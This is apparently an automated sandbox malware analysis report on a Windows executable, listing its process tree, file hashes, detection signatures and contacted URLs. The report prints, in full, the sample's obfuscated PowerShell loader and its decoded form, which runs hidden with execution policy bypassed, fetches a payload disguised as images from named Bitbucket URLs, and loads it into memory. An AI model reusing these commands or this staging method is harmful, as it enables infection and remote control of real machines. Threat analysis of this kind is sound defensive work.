Automated Malware Analysis IOC Report for

Files

File Path

Type

Processes

Path

Cmdline

Malicious

C:\Users\user\Desktop\0XVZC3kfwL.exe

"C:\Users\user\Desktop\0XVZC3kfwL.exe"

Details

Is windows:	false
Is dropped:	false
PID:	3832
Target ID:	0
Parent PID:	4084
Name:	0XVZC3kfwL.exe
Path:	C:\Users\user\Desktop\0XVZC3kfwL.exe
Commandline:	"C:\Users\user\Desktop\0XVZC3kfwL.exe"
Size:	192512
MD5:	AF93D5A246B37CE552356E6B61C9AEC9
Time:	13:04:48
Date:	02/10/2024
Reason:	newprocess
Reputation:	low
Is admin:	true
Is elevated:	true
Modulebase:	0x7ff681c20000
Modulesize:	196608
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Antivirus / Scanner detection for submitted sample	AV Detection
Multi AV Scanner detection for submitted file	AV Detection
Binary contains a suspicious time stamp	Data Obfuscation	Timestomp
PE file contains executable resources (Code or Archives)	System Summary
Sample file is different than original file name gathered from version info	System Summary
Sigma detected: CurrentVersion Autorun Keys Modification	System Summary
PE file has an executable .text section and no other executable section	System Summary
Sample is known by Antivirus	System Summary
Spawns processes	System Summary	Process Injection
PE file contains a valid data directory to section mapping	System Summary
Binary contains paths to debug symbols	Compliance, System Summary
PE file contains a debug data directory	System Summary
Contains modern PE file flags such as dynamic base (ASLR) or NX	Compliance, System Summary
PE file contains a mix of data directories often seen in goodware	System Summary
PE file has a high image base, often used for DLLs	System Summary

C:\Windows\System32\cmd.exe

cmd /c gam.bat

Details

Is windows:	true
Is dropped:	false
PID:	2328
Target ID:	1
Parent PID:	3832
Name:	cmd.exe
Class:	cmd
Path:	C:\Windows\System32\cmd.exe
Commandline:	cmd /c gam.bat
Size:	289792
MD5:	8A2122E8162DBEF04694B9C3E0B6CDEE
Time:	13:04:48
Date:	02/10/2024
Reason:	newprocess
Reputation:	high
Is admin:	true
Is elevated:	true
Modulebase:	0x7ff78dd20000
Modulesize:	421888
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Sigma detected: Base64 Encoded PowerShell Command Detected	System Summary
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet	System Summary
Sigma detected: Change PowerShell Policies to an Insecure Level	System Summary
Executes batch files	System Summary	Scripting
Sigma detected: Non Interactive PowerShell Process Spawned	System Summary
Spawns processes	System Summary	Process Injection

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gg#ZwBk#GY#a#Bk#GY#ZwBk#C8#d#Bl#HM#d##v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#bgBl#Hc#XwBp#G0#YQBn#GU#Mg#u#Go#c#Bn#D8#MQ#0#DQ#Ng#x#Dc#Mg#x#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#GI#aQB0#GI#dQBj#Gs#ZQB0#C4#bwBy#Gc#LwBo#Gc#Z#Bm#Gg#Z#Bm#Gc#Z##v#HQ#ZQBz#HQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#G4#ZQB3#F8#aQBt#GE#ZwBl#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T#Bl#G4#ZwB0#Gg#I##9#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBT#HU#YgBz#HQ#cgBp#G4#Zw#o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##s#C##J#Bi#GE#cwBl#DY#N#BM#GU#bgBn#HQ#a##p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bj#G8#bQBt#GE#bgBk#EI#eQB0#GU#cw#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#Ck#Ow#g#CQ#b#Bv#GE#Z#Bl#GQ#QQBz#HM#ZQBt#GI#b#B5#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBS#GU#ZgBs#GU#YwB0#Gk#bwBu#C4#QQBz#HM#ZQBt#GI#b#B5#F0#Og#6#Ew#bwBh#GQ#K##k#GM#bwBt#G0#YQBu#GQ#QgB5#HQ#ZQBz#Ck#Ow#g#CQ#d#B5#H##ZQ#g#D0#I##k#Gw#bwBh#GQ#ZQBk#EE#cwBz#GU#bQBi#Gw#eQ#u#Ec#ZQB0#FQ#eQBw#GU#K##n#HQ#ZQBz#HQ#c#Bv#Hc#ZQBy#HM#a#Bl#Gw#b##u#Eg#bwBt#GU#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#bQBl#HQ#a#Bv#GQ#I##9#C##J#B0#Hk#c#Bl#C4#RwBl#HQ#TQBl#HQ#a#Bv#GQ#K##n#Gw#YQ#n#Ck#LgBJ#G4#dgBv#Gs#ZQ#o#CQ#bgB1#Gw#b##s#C##WwBv#GI#agBl#GM#d#Bb#F0#XQ#g#Cg#JwB0#Hg#d##u#G8#cgBG#EE#bQBj#G8#LwBz#GQ#YQBv#Gw#bgB3#G8#Z##v#HI#ZwBm#GQ#LwB3#Gc#Z#Bz#C8#ZwBy#G8#LgB0#GU#awBj#HU#YgB0#Gk#Yg#v#C8#OgBz#H##d#B0#Gg#Jw#s#C##Jw#w#Cc#L##g#Cc#UwB0#GE#cgB0#HU#c#BO#GE#bQBl#Cc#L##g#Cc#UgBl#Gc#QQBz#G0#Jw#s#C##Jw#w#Cc#KQ#p#H0#fQ#=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string($codigo.replace('#','A')));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"

Details

Is windows:	true
Is dropped:	false
PID:	4640
Target ID:	4
Parent PID:	2328
Name:	powershell.exe
Class:	powershell
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Commandline:	powershell "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gg#ZwBk#GY#a#Bk#GY#ZwBk#C8#d#Bl#HM#d##v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#bgBl#Hc#XwBp#G0#YQBn#GU#Mg#u#Go#c#Bn#D8#MQ#0#DQ#Ng#x#Dc#Mg#x#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#GI#aQB0#GI#dQBj#Gs#ZQB0#C4#bwBy#Gc#LwBo#Gc#Z#Bm#Gg#Z#Bm#Gc#Z##v#HQ#ZQBz#HQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#G4#ZQB3#F8#aQBt#GE#ZwBl#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T#Bl#G4#ZwB0#Gg#I##9#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBT#HU#YgBz#HQ#cgBp#G4#Zw#o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##s#C##J#Bi#GE#cwBl#DY#N#BM#GU#bgBn#HQ#a##p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bj#G8#bQBt#GE#bgBk#EI#eQB0#GU#cw#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#Ck#Ow#g#CQ#b#Bv#GE#Z#Bl#GQ#QQBz#HM#ZQBt#GI#b#B5#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBS#GU#ZgBs#GU#YwB0#Gk#bwBu#C4#QQBz#HM#ZQBt#GI#b#B5#F0#Og#6#Ew#bwBh#GQ#K##k#GM#bwBt#G0#YQBu#GQ#QgB5#HQ#ZQBz#Ck#Ow#g#CQ#d#B5#H##ZQ#g#D0#I##k#Gw#bwBh#GQ#ZQBk#EE#cwBz#GU#bQBi#Gw#eQ#u#Ec#ZQB0#FQ#eQBw#GU#K##n#HQ#ZQBz#HQ#c#Bv#Hc#ZQBy#HM#a#Bl#Gw#b##u#Eg#bwBt#GU#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#bQBl#HQ#a#Bv#GQ#I##9#C##J#B0#Hk#c#Bl#C4#RwBl#HQ#TQBl#HQ#a#Bv#GQ#K##n#Gw#YQ#n#Ck#LgBJ#G4#dgBv#Gs#ZQ#o#CQ#bgB1#Gw#b##s#C##WwBv#GI#agBl#GM#d#Bb#F0#XQ#g#Cg#JwB0#Hg#d##u#G8#cgBG#EE#bQBj#G8#LwBz#GQ#YQBv#Gw#bgB3#G8#Z##v#HI#ZwBm#GQ#LwB3#Gc#Z#Bz#C8#ZwBy#G8#LgB0#GU#awBj#HU#YgB0#Gk#Yg#v#C8#OgBz#H##d#B0#Gg#Jw#s#C##Jw#w#Cc#L##g#Cc#UwB0#GE#cgB0#HU#c#BO#GE#bQBl#Cc#L##g#Cc#UgBl#Gc#QQBz#G0#Jw#s#C##Jw#w#Cc#KQ#p#H0#fQ#=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string($codigo.replace('#','A')));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
Size:	452608
MD5:	04029E121A0CFA5991749937DD22A1D9
Time:	13:04:49
Date:	02/10/2024
Reason:	newprocess
Reputation:	high
Is admin:	true
Is elevated:	true
Modulebase:	0x7ff6cb6b0000
Modulesize:	462848
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Sigma detected: Powershell download and load assembly	Data Obfuscation
Sigma detected: Powershell download payload from hardcoded c2 list	Spreading
Yara detected Powershell download and execute	HIPS / PFW / Operating System Protection Evasion
Bypasses PowerShell execution policy	HIPS / PFW / Operating System Protection Evasion	PowerShell
Found suspicious powershell code related to unpacking or dynamic code loading	Data Obfuscation	Software Packing
Sigma detected: Base64 Encoded PowerShell Command Detected	System Summary
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands	System Summary
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet	System Summary
Suspicious powershell command line found	Data Obfuscation	PowerShell
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Sigma detected: Change PowerShell Policies to an Insecure Level	System Summary
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation	System Summary
Sigma detected: Usage Of Web Request Commands And Cmdlets	System Summary
Very long cmdline option found, this is very uncommon (may be encrypted or packed)	HIPS / PFW / Operating System Protection Evasion	Command and Scripting Interpreter
Sigma detected: Non Interactive PowerShell Process Spawned	System Summary
Spawns processes	System Summary	Process Injection
Binary contains paths to debug symbols	Compliance, System Summary

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/hgdfhdfgd/test/downloads/new_image2.jpg?14461721', 'https://bitbucket.org/hgdfhdfgd/test/downloads/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.orFAmco/sdaolnwod/rgfd/wgds/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}"

Details

Is windows:	true
Is dropped:	false
PID:	6592
Target ID:	5
Parent PID:	4640
Name:	powershell.exe
Class:	powershell
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/hgdfhdfgd/test/downloads/new_image2.jpg?14461721', 'https://bitbucket.org/hgdfhdfgd/test/downloads/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.orFAmco/sdaolnwod/rgfd/wgds/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}"
Size:	452608
MD5:	04029E121A0CFA5991749937DD22A1D9
Time:	13:04:51
Date:	02/10/2024
Reason:	newprocess
Reputation:	high
Is admin:	true
Is elevated:	true
Modulebase:	0x7ff6cb6b0000
Modulesize:	462848
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Sigma detected: Powershell download and load assembly	Data Obfuscation
Sigma detected: Powershell download payload from hardcoded c2 list	Spreading
Yara detected Powershell download and execute	HIPS / PFW / Operating System Protection Evasion
Bypasses PowerShell execution policy	HIPS / PFW / Operating System Protection Evasion	PowerShell
Found suspicious powershell code related to unpacking or dynamic code loading	Data Obfuscation	Software Packing
Sigma detected: Base64 Encoded PowerShell Command Detected	System Summary
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands	System Summary
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet	System Summary
Suspicious powershell command line found	Data Obfuscation	PowerShell
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Sigma detected: Change PowerShell Policies to an Insecure Level	System Summary
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation	System Summary
Sigma detected: Usage Of Web Request Commands And Cmdlets	System Summary
Very long cmdline option found, this is very uncommon (may be encrypted or packed)	HIPS / PFW / Operating System Protection Evasion	Command and Scripting Interpreter
Sigma detected: Non Interactive PowerShell Process Spawned	System Summary
Spawns processes	System Summary	Process Injection
Binary contains paths to debug symbols	Compliance, System Summary

C:\Windows\System32\conhost.exe

C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

Details

Is windows:	true
Is dropped:	false
PID:	6220
Target ID:	2
Parent PID:	2328
Name:	conhost.exe
Path:	C:\Windows\System32\conhost.exe
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Size:	862208
MD5:	0D698AF330FD17BEE3BF90011D49251D
Time:	13:04:48
Date:	02/10/2024
Reason:	newprocess
Reputation:	high
Is admin:	true
Is elevated:	true
Modulebase:	0x7ff6ee680000
Modulesize:	892928
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Spawns processes	System Summary	Process Injection

C:\Windows\System32\rundll32.exe

"C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\"

Details

Is windows:	true
Is dropped:	false
PID:	3064
Target ID:	6
Parent PID:	4084
Name:	rundll32.exe
Class:	rundll32
Path:	C:\Windows\System32\rundll32.exe
Commandline:	"C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\"
Size:	71680
MD5:	EF3179D498793BF4234F708D3BE28633
Time:	13:05:00
Date:	02/10/2024
Reason:	newprocess
Reputation:	high
Is admin:	false
Is elevated:	false
Modulebase:	0x7ff6b80e0000
Modulesize:	94208
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Sigma detected: CurrentVersion Autorun Keys Modification	System Summary
Runs a DLL by calling functions	System Summary	Rundll32
Spawns processes	System Summary	Process Injection

URLs

Name

Malicious

https://bitbucket.org/hgdfhdfgd/test/downloads/new_image.jpg?14441723

185.166.143.49

https://bitbucket.org/hgdfhdfgd/test/downloads/new_image2.jpg?14461721

185.166.143.49

https://bitbucket.org

unknown

https://go.microsoft.co

unknown

http://crl.microsoft

unknown

https://admin.atlassian.com

unknown

https://contoso.com/License

unknown

https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/

unknown

https://aka.ms/pscore6

unknown

https://bitbucket.org/blog/announcing-our-new-ci-cd-runtime-with-up-to-8x-faster-builds

unknown

https://api.bitbucket.org

unknown

https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/

unknown

https://preferences.atlassian.com

unknown

https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/3ff600212c86/dist/webpack

unknown

https://www.atlassian.com/try/cloud/signup?bundle=bitbucket

unknown

https://remote-app-switcher.prod-east.frontend.public.atl-paas.net

unknown

https://bitbucket.status.atlassian.com/

unknown

https://contoso.com/

unknown

https://nuget.org/nuget.exe

unknown

https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/3ff600212c86/css/entry/ap

unknown

https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/3ff600212c86/css/entry/ve

unknown

https://oneget.orgX

unknown

https://id.atlassian.com/profile/rest/profile"

unknown

https://aui-cdn.atlassian.com/

unknown

https://bitbucket.org/gateway/api/emoji/

unknown

https://bqlf8qjztdtr.statuspage.io

unknown

http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

unknown

https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/3ff600212c86/css/entry/ad

unknown

